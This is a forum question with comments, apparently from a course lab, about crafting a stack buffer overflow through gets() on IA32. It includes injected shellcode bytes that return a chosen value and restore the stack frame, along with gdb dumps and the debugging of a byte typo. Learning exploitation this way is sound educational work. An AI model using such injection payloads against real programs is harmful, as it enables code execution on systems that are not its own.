# Cleaning up stack in Buffer Overflow

Tags: assembly, gdb, stack-trace, buffer-overflow, x86

I am performing a buffer overflow for educational purposes only. I have a function called that uses gets to receive input from the terminal. I want to force this function to return a specific value "`0x524ddf1e`" to the function that called it and keep it unaware that the stack was modified. This is C code running on an IA32. My thought process is as follows:

```
1. b8 1e df 4d 52       mov    $0x524ddf1e,%eax
2. bd f8 72 ff ff       mov    $0xffff72f8,%ebp
3. 68 12 8a 04 08       push   $0x8048a12
4. c3                   ret
```

Line 1. I want to move my specific value into %eax.

Line 2. I break in the function and read ebp as 0xffff72f8 so I want to return it back as such to keep the stack clean.

Line 3. I want to return to the function that called me in the correct place.

Line 4. return.

A dump of my stack frozen entering the function is:

```
(gdb) x /16wx 0xffff72a4
0xffff72a4: 0x00681fc4  0x00671a62  0x00682ab0  0xf7ffc6b0
*(VVVV 0xffff72b4 is where my exploit code is written VVVV)*
0xffff72b4: 0x00000001  0x00000001  0xffff7304  0x080483c8
0xffff72c4: 0x0804a108  0xffff72f8  0x08048a12  0x00000000
0xffff72d4: 0x00000000  0xffff72f8  0x006ce7d0  0xffffd5b8
```

%ebp and %esp are:

```
esp            0xffff72a0   0xffff72a0
ebp            0xffff72c8   0xffff72c8
```

When I am thinking of writing the raw byte codes (later to be interpreted) I do the following:

```
b8 1e df 4d 52 db f8 72 ff ff 68 12 8a 04 08 c3 08 a1 04 08 f8 72 ff ff b4 72 ff ff
|---------------exploit code-------------------||------keep same------||-where exploit code starts-|
```

`Keep same` was where I just decided to keep the original values the same as they were before, in the stack dump above.

I think I am misunderstanding something either when I am writing the assembly or here when I am trying to write the byte codes to inject. I see a SIGILL at 0xffff72b9. Any advice is appreciated.

Comment: @user1416420 On the IA32 it is `mov (src), (dest)` [textbook](http://books.google.com/books?id=C3_WIQOYE2EC&pg=PA46&lpg=PA46&dq=mov+dest+src+IA32&source=bl&ots=G7Sc_I66EO&sig=fpeVt7mWPiGrNHlhAYKrzX6qzcg&hl=en&sa=X&ei=n_ocUaCaLsLIiwKWo4HQCg&ved=0CDkQ6AEwAg#v=onepage&q=mov%20dest%20src%20IA32&f=false) [oracle](http://docs.oracle.com/cd/E19455-01/806-3773/6jct9o0b6/index.html) [stanford](http://www.stanford.edu/class/cs107/other/IA32_Cheat_Sheet.pdf). Is what I am trying to do in assembly correct?

Comment: I'm not 100% sure, have you been able to jump to your `line #1` ? So have you overwritten the gets instruction return pointer already or your calling function (like main) ?

Comment: ahh I think I see the error `push  $0x8048a12` is missing a 0, `push  $0x08048a12` ?

Comment: Ya, I was able to jump to and execute that line. The $0x8048a12 is just fine without the leading 0, you can see next to it the byte codes generated with a leading 0.

Comment: Yeah, true, it's been a while. I don't see anything wrong with your code. What happens after the ret instruction ? Crash or location ? Why not try a different approach why not basically jump to `$0x8048a12` instead of push & return ? (another q last one; What OS are you running ?)

Comment: Oh... just got it... I switched `b` and `d` on Line 2 when I was injecting it... Gotta love those long searches for typos...

Comment: seriously:) I was wondering what can be going on ... is the system detecting the stack modification late .. sweet:) well ... +1 to you I guess:)